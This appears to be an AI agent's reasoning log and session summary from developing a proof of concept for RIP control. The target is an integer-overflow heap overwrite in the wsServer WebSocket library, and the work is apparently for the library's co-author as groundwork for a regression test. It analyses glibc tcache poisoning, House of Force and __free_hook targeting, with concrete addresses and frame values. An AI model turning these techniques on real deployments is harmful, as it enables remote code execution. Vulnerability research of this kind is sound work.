For the main thread, the tcache struct is allocated during the first malloc (in __libc_malloc → tcache_init). For thread arenas, it's allocated during arena_get → arena_thread_freeres... no, actually tcache_init is called per-thread.
In our case:
- calloc(1, 61) in get_handshake_accept is the thread's first allocation
- __libc_malloc checks if tcache is initialized. If not, tcache_init() allocates the tcache struct.
- tcache_init() does malloc(sizeof(tcache_perthread_struct)) → malloc(640) on 2.31 → chunk size 0x290 (656 bytes); pre-2.30 it was 576/592.

So the tcache struct is the FIRST chunk on the thread's heap. All subsequent allocations come after it. Our overflow buffer is way after the tcache struct. We can't reach it with a forward overflow.
Wait, what about the entries[] array itself?
If we overflow into a chunk that was PREVIOUSLY a tcache entry, and that chunk's memory (specifically the first 8 bytes of user data, which is the fd/next pointer) is being read by tcache_get... no, the tcache entries are just linked list nodes in freed chunks. The entries[] array in tcache_perthread_struct points to the head of each bin's list.
OK, I'm convinced that cross-thread exploitation via tcache is not feasible with this specific vulnerability and server architecture. Let me look for a different angle entirely.
New approach: Make the server write to __free_hook during the overflow itself
What if we can control WHERE the overflow data is written? The overflow writes to msg[*msg_idx] where *msg_idx starts at f1sz and increments. If we could make msg point to an interesting address...
But msg is the realloc'd buffer. It's a heap address. We can't control it.
What about making *msg_idx very large (wrapping around to point to __free_hook's address)? *msg_idx starts at f1sz and increments by 1 for each byte. After frame_length iterations, *msg_idx = f1sz + frame_length. But frame_length is ~2^64, so *msg_idx wraps around many times. The write goes to msg[*msg_idx] which wraps around the address space... but msg is a heap pointer, and adding ~2^64 to it wraps the address, potentially pointing anywhere.
But the write loop reads one byte at a time from the socket. We can't control the wrap-around precisely because msg_idx increments by 1 each iteration. The writes would go to msg + f1sz, msg + f1sz + 1, msg + f1sz + 2, ..., up to the maximum before wrapping. That's msg + f1sz + (2^64 - frame_length) which is... well, frame_length = 2^64 - f1sz + target_wrapped_value. So msg_idx wraps after frame_length = 2^64 - f1sz + wrap iterations, at which point msg_idx = 2^64 + wrap, which wraps to wrap.
But this requires sending 2^64 - f1sz bytes to the socket. Not feasible.
OK let me take a completely different approach and think about what IS feasible.
Feasible approach: Demonstrate heap corruption, then explain the RIP control path theoretically
For the PoC, we could:
But the user wants an actual RIP control crash, not just a theoretical explanation.
Let me reconsider the fastbin approach, even with tcache issues
Actually, wait. I was wrong about not being able to fill tcache. Let me reconsider.
The echo server does:
- malloc(msg_size) → msg (T1's tcache or top)
- ws_sendframe_bcast → malloc(header + size + 1) → response (T1's tcache or top)
- free(response) → T1's tcache
- free(msg) → T1's tcache

For a 97-byte message, both msg and response are 0x70 chunks. After one round-trip, tcache[5] has 2 entries.
But what about making the sizes DIFFERENT for msg and response? If msg is 0x70 but response is a DIFFERENT size, they go to different tcache bins.
The response size = 2 + msg_size + 1 = msg_size + 3. For msg_size = 97: response = malloc(100) → 0x70 chunk. Same bin.
To make them different bins, the two sizes would have to round to different chunk classes:
- msg_size = 97: malloc(97) → 0x70 chunk; response: malloc(100) → 0x70 chunk. Same.
- msg_size = 33: malloc(33) → (33+8+15) & ~15 = 56 & ~15 = 48 = 0x30 chunk (48 ≥ MINSIZE of 32, fine). Response: malloc(36) → (36+8+15) & ~15 = 59 & ~15 = 48 = 0x30. Same.
So with the echo server, msg and response land in the same bin for these sizes (response = msg + 3 bytes of header); even a size that straddles a 16-byte rounding boundary would only split them into adjacent bins, one entry each.
What about using the onclose/onopen printf?
The onopen callback does printf("Connection opened, addr: %s, port: %s\n", cli, port). The first printf on a thread may allocate stdout's buffer (8192 bytes). This is a one-time allocation that stays.
But this doesn't help with filling tcache.
What about multiple sequential connections on the SAME thread?
When connection 1's thread exits, the thread resources (including tcache) are destroyed. But the heap memory (thread arena) persists and is reused by the next thread.
When connection 2's thread starts, it gets a new tcache. But the heap already has chunks that were in connection 1's tcache. These chunks are "freed" (their memory was given to tcache_put) but not in any bin. They're effectively leaked.
When connection 2's thread does its first malloc, the tcache is empty, so it checks fastbins (empty) then bins (empty) then top. It allocates from top. The leaked chunks from T1's tcache are wasted heap space.
BUT: if connection 2's thread frees chunks, they go to T2's tcache (empty). When T2's tcache fills up, further frees go to fastbins. These fastbin entries are in the shared arena and persist.
So the approach would be:
Wait, let me trace this more carefully.
Connection 2 handshake:
After handshake: T2's tcache has 1 entry in bins 1, 2, 7.
Connection 2 shaping message 1 (97 bytes):
Shaping message 2:
Same pattern. tcache[5] count oscillates between 0 and 2. We never get past 2.
This confirms that on a single connection, tcache for any given bin maxes out at 2 entries.
What about opening multiple connections simultaneously?
If we open connections 1, 2, 3, 4 simultaneously (or in rapid succession), each gets its own thread. They all operate independently.
What if we have all of them send shaping messages and then close? Each thread's tcache leaks. Then the next connection gets a fresh tcache.
This doesn't help accumulate tcache entries or fastbin entries.
Wait, what about having multiple concurrent connections?
If we have connection 1 (thread T1) and connection 2 (thread T2) open simultaneously:
But T1 and T2 have different tcaches. T1's overflow corrupts T1's tcache entries. T2 can't see them.
Unless T1 and T2 share the same arena, and we can corrupt fastbins. But we can't get chunks into fastbins.
Hmm, what if we corrupt the arena's malloc_state directly?
The arena's malloc_state contains bins, fastbins, top, etc. If we can locate it and overwrite it with the overflow, we can redirect allocations.
The thread arena's malloc_state is typically at the start of the heap segment. For thread arenas created via mmap, the malloc_state is at the beginning of the mmap'd region.
If the malloc_state is BEFORE our overflow buffer (which it should be, since it's allocated first), we can't reach it with a forward overflow.
I think we need to find a way to make the exploit work on a single thread, without needing subsequent mallocs.
The only code executed after the overflow on the same thread is:
- free(fsd.msg_data) at line 1713
- the onclose callback
- close_client

If we can make free(fsd.msg_data) trigger __free_hook, we win. For that, __free_hook needs to be non-NULL. But we haven't written to __free_hook yet.
Unless... we write to __free_hook DURING the overflow. If our overflow data reaches __free_hook, we set it to a function pointer, and then free(msg_data) calls it.
But __free_hook is in libc's BSS, far from the heap. Our overflow goes forward in the heap, not to arbitrary addresses.
What about a partial overwrite of a heap address to redirect it to __free_hook?
If we can overwrite a heap variable that contains a function pointer... but the heap doesn't typically contain function pointers (that's more of a C++ vtable thing).
OK, I think I need to accept the limitations and go with the simplest possible PoC.
Let me reconsider the approach where we DO get RIP control but through a slightly different mechanism.
Approach: Corrupt the msg buffer itself to cause a crash at a controlled address
After the overflow, free(msg_data) is called. If the msg chunk's metadata is corrupted (e.g., its size field), free() may crash in a way that reveals control.
But our overflow goes FORWARD from msg. The chunk metadata is at msg-16 (before msg). We don't corrupt it.
What about corrupting the next chunk's metadata so that when free(msg) triggers consolidation with the next chunk, it crashes?
Actually, free(msg) goes to tcache first (if room). tcache_put doesn't check the next chunk. So no crash from next-chunk metadata corruption.
But what if tcache is full for this bin? Then free(msg) goes to _int_free, which DOES check the next chunk's size. If we've corrupted the next chunk's size to an invalid value, _int_free will abort with "corrupted size vs. prev_size while consolidating" or similar.
But this gives an abort at a glibc assertion, not RIP control. And we can't fill tcache for this bin.
Actually, let me reconsider. Can we fill tcache for the exploit buffer's bin?
The exploit buffer is allocated by read_single_frame as realloc(NULL, f1sz) = malloc(f1sz). This happens ONCE for the exploit. Before that, during shaping, the msg buffers are allocated and freed, going to tcache.
If we use f1sz = 32 (so msg is a 48-byte chunk, tcache[1]):
- malloc(32) → pops from tcache[1]; count goes to 1
- free(msg_data) → tcache_put; count goes back to 2

tcache[1] never exceeds 2. So free always goes to tcache, never to fastbin.
UNLESS we make the exploit frame's chunk a different size from the shaping chunks.
If shaping uses 32-byte payloads (48-byte chunks, tcache[1]) and the exploit frame uses a DIFFERENT size, then the exploit buffer goes to a different tcache bin. If that bin is empty, free goes to tcache.
Hmm, this doesn't help either.
What if we use the __free_hook trick differently?
Wait, I just had an idea. What if instead of poisoning tcache to get a chunk at __free_hook, we use the overflow to write a function pointer to a heap location that the server will later use as a callback?
The ws_connection struct has function pointers (onopen, onclose, onmessage) in the ws_server sub-struct. But these are in BSS, not on the heap.
The ws_frame_data struct is on the STACK (it's a local variable in ws_establishconnection). We can't overflow into the stack from the heap.
OK, final idea: Use the thread arena's heap to corrupt the arena header
Thread arenas on glibc 2.31 are allocated via mmap with a specific layout:
[arena header (malloc_state)] [heap chunks...] [top]
The malloc_state is at the start of the mmap'd region. Chunks come after it. If we can overflow all the way to the arena header... but it's at the BEGINNING of the heap, and our buffer is way past it. We'd need to overflow backwards.
This is not feasible.
Let me take a step back and think about what IS achievable.
Given the constraints:
What CAN we do?
The actual RIP control requires either:
For option 3: can we make free() jump to a controlled address?
On glibc 2.31, free() checks __free_hook first:

```c
void (*hook) (void *, const void *) = atomic_forced_read (__free_hook);
if (__builtin_expect (hook != NULL, 0))
  {
    (*hook)(p, RETURN_ADDRESS (0));
    return;
  }
```

If __free_hook is non-NULL, free() calls it. But __free_hook starts as NULL and we can't write to it from the heap.
Unless... we can find a way to make free() itself crash at a controlled RIP. For example, if the chunk being freed has a corrupted fd pointer, and tcache_put writes to e->key:
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
e->key = tcache;
e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}tcache_put writes to e->key and e->next. If e (the chunk being freed) is at a controlled address... but e is msg_data, which is a heap address. We can't control where e points.
Hmm, what about tcache->entries[tc_idx]? tcache is T1's tcache_perthread_struct. We can't corrupt it.
OK, I think the real answer here is that we need to be smarter about the heap layout.
Let me reconsider the two-connection approach, but this time focusing on what happens when T2 allocates from the arena (not tcache).
When T2's tcache is empty for a given bin, malloc checks:
If T1's overflow corrupts the TOP CHUNK's size field, then when T2 allocates from top, the corrupted size might cause issues.
Actually, that's an interesting idea! What if we corrupt the top chunk?
From the previous GDB run, the chunk after msg WAS the top chunk. If we corrupt the top chunk's size, then when T2 allocates from top:
- malloc calls _int_malloc → checks bins → falls through to top
- only if top is too small does sysmalloc extend the heap via sbrk or mmap

But corrupting the top chunk to what value? And how does this give us RIP control?
Actually, there's a well-known technique called House of Force: corrupt the top chunk's size to a very large value (like 0xFFFFFFFFFFFFFFFF). Then any large malloc will succeed and return an address calculated from top + requested_size. If we request a specific size, we can make malloc return an arbitrary address.
But House of Force requires (roughly): corrupting top's size to a huge value, a subsequent malloc whose size we control well enough to move top next to the target, and known addresses for both top and the target.
Let me trace this:
On connection 1, overflow corrupts the top chunk's size to 0xFFFFFFFFFFFFFFFF
Connection 1's thread exits
Connection 2 starts, same arena (top chunk is still corrupted)
Connection 2's handshake: first malloc is calloc(1, 61). T2's tcache empty → top. Since top's size is huge, malloc(64) splits top and returns a chunk. But where?
- victim = top (the top chunk)
- size = chunksize(victim) = 0xFFFFFFFFFFFFFFFF
- remainder_size = size - nb (nb = 0x50 for malloc(64))
- remainder = victim + nb

Subsequent mallocs on T2 also split from the corrupted top. Eventually, the top pointer wraps around the address space...
Hmm, this doesn't directly give us a chunk at __free_hook. For that, we'd need:
- target: &__free_hook - 0x10 (to account for chunk header)
- old_top (known, fixed address)
- request of &__free_hook - 0x10 - old_top - 0x10 = &__free_hook - old_top - 0x20

Actually, House of Force works like this:
- delta = target - old_top - chunk_header
- after malloc(delta), old_top + delta = target

For our case:
- target = &__free_hook - sizeof(chunk_header) = 0x7ffff7f9de48 - 16 = 0x7ffff7f9de38
- old_top = address of the top chunk (known from GDB: 0x7ffff0000c60 + 0x25 aligned... wait, let me recalculate)

From GDB: msg chunk at 0x7ffff0000c60, size 0x25 (which is 0x20 | PREV_INUSE | NON_MAIN_ARENA = 32 with flags). Wait, 0x25 = 37? That doesn't make sense for a chunk size.
Oh wait, I think the GDB output showed the raw chunk metadata. Let me re-read: "chunk at 0x7ffff0000c60, size 0x25 (32 | PREV_INUSE | NON_MAIN_ARENA)". But 0x25 = 37, not 32. Hmm. 0x20 = 32. 0x21 = 33. 0x25 = 37.
Actually, the chunk size field includes flags in the low 3 bits: 0x25 = 0b100101. The actual size is 0x25 & ~7 = 0x20 = 32. Flags: PREV_INUSE (bit 0 = 1), NON_MAIN_ARENA (bit 2 = 1).
So the chunk is 32 bytes (user data: 16 bytes). For f1sz=16, the msg is 16 bytes, fitting exactly in a 32-byte chunk.
The next chunk (top chunk) starts at 0x7ffff0000c60 + 0x20 = 0x7ffff0000c80. From GDB, the corrupted area at 0x7ffff0000c80 had prev_size=0, size=0x21, fd=0x4141... So the top chunk was at 0x7ffff0000c80 and its size was 0x21 & ~7 = 0x20 = 32.
Wait, the top chunk should be very large (the remaining heap space). A size of 0x20 seems too small. Unless the heap was very small.
Actually, for a thread arena created via mmap, the initial heap size is typically 1MB or so. The top chunk should be large. A size of 0x20 (32 bytes) doesn't make sense for the top chunk.
Hmm, maybe the GDB output was showing the corrupted state AFTER the overflow? The original top chunk's size was overwritten by our overflow data. We wrote a fake chunk pattern with size=0x21. That's the corrupted value, not the original.
So the original top chunk was at 0x7ffff0000c80 with some large size. We overwrote it with our pattern (prev_size=0, size=0x21, fd=0x4141...).
This is perfect for House of Force!
Instead of writing a fake chunk pattern, we should write a top-chunk size of 0xFFFFFFFFFFFFFFFF (-1 as a signed value). Then on the next connection (T2), we can use House of Force to get a chunk at __free_hook.
Here's the refined plan:
1. Connection 1: trigger the overflow and write the top chunk's size field as -1
2. Connection 2: House of Force an allocation so that a later malloc returns a chunk at __free_hook - 16

But wait, the handshake happens before we can control anything. The handshake does malloc(61), malloc(31), malloc(130). These all come from the corrupted top chunk. After the handshake, top has advanced by 64 + 48 + 144 = 256 bytes (approximately). Then we send a message whose size causes the echo's malloc to return __free_hook.
Actually, the echo response malloc is: malloc(2 + msg_size + 1). We control msg_size. We want malloc to return __free_hook.
For House of Force:
- current top after the handshake: old_top + 256 (approximately)
- target: __free_hook - 16
- required request: (__free_hook - 16) - top_after_handshake - 16

But this size might be negative (if __free_hook is before the top). In that case, on glibc 2.31 x86_64, unsigned arithmetic wraps around, and top + huge_size wraps to the target.
Wait, but malloc checks size < remainder_size. If the top chunk's size is 0xFFFFFFFFFFFFFFFF and we request a huge size, nb = request2size(huge_size). The check is nb < remainder_size = nb < 0xFFFFFFFFFFFFFFFF. For any reasonable nb, this passes. But nb could wrap around...
Actually, the malloc code does:

```c
if (nb < old_size) {
    new_size = old_size - nb;
    ...
}
```

Where old_size = 0xFFFFFFFFFFFFFFFF. For nb up to 0xFFFFFFFFFFFFFFFE, this passes. And new_size = 0xFFFFFFFFFFFFFFFF - nb.
And splitting just advances top by the request: new_top = old_top + nb. For the next malloc, it returns the new top. So, to get a chunk at __free_hook:
- old_top + nb1 = &__free_hook - sizeof(header)
- nb1 = &__free_hook - sizeof(header) - old_top

This could be a very large (or "negative", wrapping) value. But we need to malloc this size. The request size would be nb1 - 2*SIZE_SZ (approximately).
Hmm, but we also need to consider that the malloc for the response has to come from this specific path. Let me trace more carefully.
Actually, for House of Force, we typically do ONE large allocation to move the top to the target, then the NEXT allocation returns the target.
But in our case, the path is:
- malloc(msg_size) for msg
- malloc(response_size) for the echo response

We want one of these mallocs to return __free_hook. We'd need to calculate the exact distance from the current top (after the handshake mallocs) to __free_hook.
This requires knowing:
- the current top address after the handshake
- the target: &__free_hook - 16

Let me calculate:
- top before tcache init: 0x7ffff0000c80 (from GDB)
- tcache_init → malloc(640) → 0x290-byte chunk from top → top = 0x7ffff0000c80 + 0x290 = 0x7ffff0000f10
- calloc(1, 61): malloc(61) → 64-byte chunk → top = 0x7ffff0000f10 + 64 = 0x7ffff0000f50
- base64_encode: malloc(31) → 48-byte chunk → top = 0x7ffff0000f50 + 48 = 0x7ffff0000f80
- malloc(130) → 144-byte chunk → top = 0x7ffff0000f80 + 144 = 0x7ffff0001010

Now T2 sends a message. msg_size needs to be chosen so that the echo response malloc returns __free_hook.
Actually, let me reconsider. For House of Force, the key is to make ONE large allocation that moves the top pointer to right before __free_hook. Then the NEXT allocation returns a chunk at __free_hook.
But in our case, the first "user-controlled" malloc on T2 is the msg allocation in read_single_frame. We can make this a specific size. Then the echo response allocation follows.
If the msg allocation moves top to right before __free_hook:
- choose msg_size such that request2size(msg_size) = &__free_hook - 16 - current_top
- then malloc(2 + msg_size + 1) for the response → returns a chunk at __free_hook

But wait, &__free_hook - 16 - current_top might be negative (if __free_hook is before current_top). In that case, request2size would wrap around.
current_top ≈ 0x7ffff0001010 (from the calculation above)
&__free_hook - 16 = 0x7ffff7f9de38
&__free_hook - 16 - current_top = 0x7ffff7f9de38 - 0x7ffff0001010 = 0x7f9ce28 ≈ 128 MB
So we'd need a ~128 MB allocation. That's request2size(0x7f9ce28) = 0x7f9ce30. Can we send a message with this size? The msg allocation is malloc(f1sz) where f1sz is the frame 1 payload size. For a non-FIN frame, f1sz can be up to... well, the server reads from the socket using next_byte(). The maximum read per call is MESSAGE_LENGTH=2048. So the message payload is limited to 2048 bytes in practice.
Wait, no. The msg allocation is realloc(msg, *msg_idx + frame_length + is_fin). For frame 1 (non-FIN), msg_idx = 0, frame_length = f1sz, is_fin = 0. So malloc(f1sz). f1sz is the payload length in the WebSocket frame, which can be up to 2^64 in theory but limited by the socket data.
But read_single_frame reads the payload byte by byte from the socket. To fill a ~128 MB message, we'd need to stream ~128 MB of data through that loop. That's not practical for a PoC.
So House of Force requires too large an allocation.
But wait - we don't need to use the msg allocation for the large jump. We can use the ECHO RESPONSE allocation.
Hmm, but we don't control the echo response's allocation directly. The echo response size is 2 + msg_size + 1. And msg_size is what we send.
The issue is the same: we need a large allocation to make the jump from the heap to libc.
OK so House of Force requires a large allocation, which we can't do through the echo server.
Revised House of Force: Use a NEGATIVE distance
What if the top chunk is BEFORE __free_hook in memory? It is: 0x7ffff0001010 < 0x7ffff7f9de38. The distance is positive (~128 MB).
What if we go the other way? What if we make top wrap around to __free_hook?
top + 0xFFFFFFFFFFFFFFFF + 1 = top (wraps to same). top + huge_value wraps around. If top + huge_value ≡ &__free_hook (mod 2^64), then huge_value = &__free_hook - top.
huge_value = 0x7ffff7f9de38 - 0x7ffff0001010 = 0x7f9ce28 ≈ 128 MB.
This is the same calculation. We need to malloc ~128 MB. Not practical.
OK so House of Force is out because the heap and libc are too far apart.
What if the heap and libc are closer?
On some systems, the heap is near libc. But on modern Linux, the heap (via mmap for thread arenas) is at a random address (though we disabled ASLR, the addresses are still "random" in the sense that they depend on the mmap layout).
Wait, we disabled ASLR. So the addresses are deterministic. But the heap and libc are still far apart in the address space.
Let me check: thread arena heap is at 0x7ffff0000000 (from GDB: chunk at 0x7ffff0000c60). Libc is mapped at 0x7ffff7dxxxxx (from GDB: system at 0x7ffff7e01290). The distance is 0x7ffff7e01290 - 0x7ffff0000c60 = 0x7e00630 ≈ 126MB. Way too far.
OK, I think I need to accept that with this specific setup (thread arenas, far from libc), we can't directly use House of Force.
Let me reconsider the problem from scratch.
Key constraint: The echo server processes each connection in a separate thread. Each thread has its own tcache. After the overflow, the thread exits without doing any more mallocs.
Possible approaches:
For approach 2: What if we use a valid multi-frame message where the overflow happens on a MIDDLE frame, not the last one?
For example: [Frame 1: non-FIN BIN, 16 bytes] [Frame 2: non-FIN CONT, overflow] [Frame 3: FIN CONT, small]
Wait, but frame 2's write loop will try to read ~2^64 bytes and fail. Unless frame 2 has a small frame_length that still causes an overflow.
For an overflow, we need f1sz + frame_length_2 > actual_buffer_size. The buffer was allocated with realloc(NULL, f1sz) = malloc(f1sz). The chunk has request2size(f1sz) bytes of space. If f1sz + frame_length_2 > request2size(f1sz), there's an overflow.
But frame_size = f1sz + frame_length_2. For this to pass the check, frame_size ≤ 16MB. So f1sz + frame_length_2 ≤ 16MB. And for overflow: f1sz + frame_length_2 > request2size(f1sz).
request2size(f1sz) ≈ f1sz + 16 (for small f1sz). So f1sz + frame_length_2 > f1sz + 16 → frame_length_2 > 16.
Wait, this doesn't work because frame_size = f1sz + frame_length_2 is checked. If frame_length_2 > 16, then frame_size > f1sz + 16 ≈ request2size(f1sz). But frame_size ≤ 16MB, and request2size(f1sz) ≈ f1sz + 16. So we'd be overflowing by frame_length_2 - 16 bytes. This is a SMALL overflow!
But does the realloc resize the buffer? realloc(msg, msg_idx + frame_length_2 + is_fin). For frame 2 (non-FIN CONT), msg_idx = f1sz, frame_length_2 = desired, is_fin = 0. So realloc(msg, f1sz + frame_length_2). Since f1sz + frame_length_2 = frame_size ≤ 16MB, this is a legitimate realloc! It would GROW the buffer to fit. No overflow.
OH. The realloc only underflows when the SIZE wraps around due to the integer overflow. Without wrapping, it's a legitimate allocation that fits the data. The overflow only happens because the realloc size wraps to a tiny value, while the write loop uses the original (huge) frame_length.
So the integer overflow in *frame_size += frame_length is ESSENTIAL. Without it, there's no overflow. And with it, the frame_length is ~2^64, making the write loop infeasible to complete.
This means the write loop ALWAYS fails after writing some bytes (our overflow), and the thread ALWAYS errors out.
Given this fundamental constraint, let me think about what CAN be achieved.
The overflow writes some bytes past the buffer. On the same thread, the only thing that happens after is free(msg_data). We need free(msg_data) to somehow trigger RIP control.
For free(msg_data):
On T1, tcache[1] (for 48-byte chunks) has at most 2 entries. So tcache is never full. free() always goes to tcache. No crash.
What if we make the chunk size indicate a DIFFERENT bin that has a full tcache?
We can't change the chunk's size (it's before the buffer in memory).
What if we use a different f1sz that results in a larger chunk, and we've filled tcache for that bin through shaping?
If we use f1sz = 97 (0x70 chunk), and we've done 4 shaping messages of 97 bytes:
Same problem. tcache never fills past 2.
Wait, what if we use MULTIPLE DIFFERENT sizes for shaping to fill tcache for a specific bin?
Actually, the issue is that each echo round-trip produces exactly 2 frees for the same bin. We can't accumulate more.
Unless... we DON'T drain the echo responses! If we send messages faster than we read responses, the server's send buffer fills up and SEND() blocks. Then the onmessage thread is stuck in ws_sendframe_internal, holding the response buffer. The msg buffer has already been freed.
Wait, let me re-read the code:
// ws_establishconnection, line 1752
while (next_complete_frame(&wfd) >= 0)
{
if ((wfd.frame_type == WS_FR_OP_TXT ||
wfd.frame_type == WS_FR_OP_BIN) && !wfd.error)
{
client->ws_srv.evs.onmessage(...);
}
// ...
free(wfd.msg); // Line 1781

onmessage is called, which does ws_sendframe_bcast → ws_sendframe_internal. In ws_sendframe_internal, the response is allocated, sent, and freed. Then control returns to onmessage, which returns. Then free(wfd.msg) is called.
If SEND blocks (because the client's recv buffer is full), the response stays allocated. The thread is blocked. Meanwhile, the next message can't be processed because we're still in onmessage.
So on a single connection, we can only have ONE outstanding response at a time. We can't accumulate free chunks.
Unless... we use BROADCAST to multiple connections! ws_sendframe_bcast sends to ALL clients on port 8080. If we have connections A, B, C all connected, a message on A triggers a broadcast to A, B, C. Each broadcast allocates ONE response buffer, sends to all, then frees it. So still only one extra allocation.
Hmm. What about ws_sendframe_bin_bcast? Same thing - one allocation per call.
OK, I'm now fairly convinced that with the current echo server architecture, we can't fill tcache beyond 2 entries per bin on a single thread, and we can't get chunks into fastbins.
But wait - what about printf?
The printf in onopen and onmessage may allocate a buffer for stdout. On the first call, printf allocates a buffer (typically 8192 bytes or the block size of the output). This is a large allocation that goes to a large bin or unsorted bin.
But this is a one-time allocation. It doesn't free or accumulate.
What about the tcache_init allocation?
When T1's first malloc triggers tcache_init, it allocates a 576-byte chunk for the tcache_perthread_struct. This is a 592-byte chunk (or similar). It's allocated once and never freed.
This doesn't help with tcache filling.
**OK, I'm going to take a completely different approach. Let me reconsider whether T1 and T2 might share the same tcache.**
Create a security PoC that proves RIP register manipulation via an integer-overflow heap overwrite vulnerability in the wsServer C library. The user is a co-creator of wsServer and discovered this vulnerability. The ultimate goal is a regression test, but the immediate step is a network-based exploration PoC demonstrating RIP control on a server built with all compiler protections disabled.
(Carried-over notes: newer glibc removes __free_hook, has safe-linking, and tcache key validation — too complex for a PoC. Code style: block comments (/* */), Doxygen for functions/structs.)

Vulnerability: read_single_frame() in src/ws.c:1410-1552
- *frame_size += fsd->frame_length — unchecked 64-bit addition, wraps around
- if (*frame_size > MAX_FRAME_LENGTH) — check is defeated by the wrapped small value
- realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin) — allocation size also wraps to ~6 bytes
- write loop uses the original fsd->frame_length, writing far past the undersized buffer

Confirmed exploit state (msg_idx=16, frame_size=16):
- frame_length = 0xFFFFFFFFFFFFFFF5
- *frame_size += frame_length → 16 + 0xFFF...F5 wraps to 5 → passes MAX_FRAME_LENGTH check
- realloc(msg, 16 + 0xFFF...F5 + 1) wraps to 6 → tiny allocation, same pointer returned
- write loop continues at msg[16], writing far past the 32-byte chunk boundary → heap corruption confirmed

Observed addresses (ASLR off):
- __free_hook = 0x7ffff7f9de48
- __malloc_hook = 0x7ffff7f9bb70
- system = 0x7ffff7e01290
- exit = 0x7ffff7df5a40

Observed heap state:
- msg chunk at 0x7ffff0000c60, size 0x25 (raw; actual size = 0x20 = 32 bytes, with PREV_INUSE | NON_MAIN_ARENA flags), user data at 0x7ffff0000c70, heap base 0x7ffff0000000+
- after overflow: msg_idx=144 (16 + 128 = 144, matching our 128-byte overflow)
- corrupted next chunk at 0x7ffff0000c80: prev_size=0, size=0x21, fd=0x4141414141414141
- free(msg) goes to tcache BEFORE the next-chunk size check

On glibc 2.31, free() checks tcache BEFORE checking the next chunk's size:

if (tc_idx < mp_.tcache_bins && tcache && tcache->counts[tc_idx] < mp_.tcache_count) {
    tcache_put(p, tc_idx);
    return; // never reaches the corrupted next-chunk check
}

This is the central unsolved problem. The most recent analysis (the interrupted reasoning block) exhaustively analyzed why the previously planned tcache poisoning strategy does NOT work:
- Each connection is handled in its own thread (ws_establishconnection). Connection 1 runs in thread T1, connection 2 in thread T2.
- Each thread gets its own tcache_perthread_struct (576 bytes, allocated as the FIRST chunk on the thread arena heap). T1's poisoned tcache is invisible to T2.
- Per message, the pattern is malloc(msg) → onmessage → malloc(response) → free(response) → free(msg). The tcache count oscillates between 0 and 2, never reaching the capacity of 7.

The interrupted analysis considered and rejected the following approaches:
- __malloc_hook - 0x23 (classic 0x7f trick) — REJECTED: same tcache-filling problem
- House of Force — REJECTED: the thread arena heap (0x7ffff0000000+) is ~128MB away from libc (0x7ffff7d00000+); would require a ~128MB allocation to bridge the gap, not feasible through WebSocket messages
- T1's post-overflow path is fixed: free(fsd.msg_data) (goes to tcache, no crash), then onclose (no mallocs), then thread exit. No subsequent mallocs on T1.

Overwrite the tcache_perthread_struct of a DIFFERENT thread — T2's tcache struct doesn't exist at overflow time (allocated on T2's first malloc, after T1 exits). BUT: what if T1 and T2 are concurrent (both alive during the overflow)? If T2 is already running when T1 does the overflow, T2's tcache struct IS on the heap and potentially reachable. This requires T2 to be connected before T1 sends the exploit frames.
Use ws_sendframe_bcast to trigger malloc on T2's thread — When T1 sends a message, ws_sendframe_bcast locks a mutex and iterates clients. The malloc(response) happens on T1's thread, not T2's. But if the broadcast SEND blocks (T2's recv buffer full), T1 is stuck holding the response allocation. Not directly useful.
Overflow into T2's tcache_perthread_struct while T2 is alive — If T2 is connected and has done its first malloc (tcache initialized), its tcache struct is on the heap. If we can shape the heap so T2's tcache struct is adjacent to T1's overflow buffer, we can overwrite T2's tcache entries directly, setting entries[X] = &__free_hook and counts[X] = 1. Then T2's next malloc of that size returns &__free_hook. This is promising but requires precise heap layout control across two threads sharing one arena.
Corrupt the top chunk to cause a crash during T2's malloc — Not RIP control, but could demonstrate impact. Less interesting for the PoC.
Use a single-threaded server — If we modify the echo server to use .thread_loop = 1 and process connections sequentially in the main thread, the tcache problem disappears entirely. The main thread uses the main arena. This is the simplest solution but requires changing the test server configuration.
Use the close_client path more carefully — The close_client function destroys mutexes. If a mutex's internal state is corrupted, pthread_mutex_destroy might crash. But this is unreliable.
Target the tcache->entries array of T1's own tcache struct — Even though T1 exits after the overflow, if we could overwrite T1's tcache entries BEFORE the free(msg_data) at line 1713, then free(msg_data) would use the corrupted tcache. But free() checks tcache->entries[tc_idx] to push to, it doesn't pop from it. Overwriting entries doesn't affect tcache_put behavior (it just sets e->next = tcache->entries[tc_idx] and tcache->entries[tc_idx] = e). So corrupting entries before a free just means the freed chunk gets linked to a corrupted list — but nobody pops from that list afterward.
- next_byte() buffers up to MESSAGE_LENGTH=2048 bytes from the socket
- read_single_frame runs BEFORE validate_utf8_txt is called

In get_handshake_accept:
1. calloc(1, 61) → 64-byte chunk → freed to tcache[2] (as str)
2. base64_encode(hash, 20, NULL) → malloc(31) → 48-byte chunk → returned as accept

In get_handshake_response:
3. malloc(130) → 144-byte chunk → returned as response
4. free(accept) → 48-byte chunk to tcache[1]
In do_handshake:
5. free(response) → 144-byte chunk to tcache[7]
For a message of size S bytes:
- read_single_frame: malloc(S) → chunk of size request2size(S)
- ws_sendframe_internal: malloc(2 + S + 1) for response (2-byte header for S≤125)
- free(response) then free(msg)
- request2size(S) = (S + 8 + 15) & ~15 on glibc 2.31 x86_64
- ws_connection structs are in static client_socks array (BSS), NOT on heap
- ws_getaddress() returns pointer to client->ip (static buffer), does NOT strdup
- close_client() only closes socket + destroys mutexes — no malloc/free
- printf in onopen may allocate stdout buffer once (large, ~8192 bytes, never freed)
- thread arena heap comes from mmap, heap starts at 0x7ffff0000000 range
- libc sits in the 0x7ffff7d00000 range — ~128MB from the thread arena heap
- AGENTS.md at repo root — compact instruction file for future agent sessions
- tests/Dockerfile.poc — Ubuntu 20.04 image, builds echo server with all protections disabled
- tests/poc_rip_control.c — Full PoC client with TCP connect, WebSocket handshake, frame builder, heap shaping, two-frame exploit, two-connection mode, configurable overflow payload
- tests/poc_gdb.txt — GDB helper script with breakpoints at vulnerable code
- tests/poc_run.sh — Orchestration script with interactive and auto modes
- Docker image tag: ws-poc

The RIP control strategy is blocked. The previously planned tcache poisoning approach (from the first session's summary) was based on an incorrect assumption that tcache entries persist across threads. The deep analysis in this session conclusively showed that per-thread tcache makes cross-thread poisoning impossible with the echo server's architecture.
Option A (simplest, recommended): Change the test server to single-threaded mode
- Set .thread_loop = 1, which processes connections sequentially in the main thread
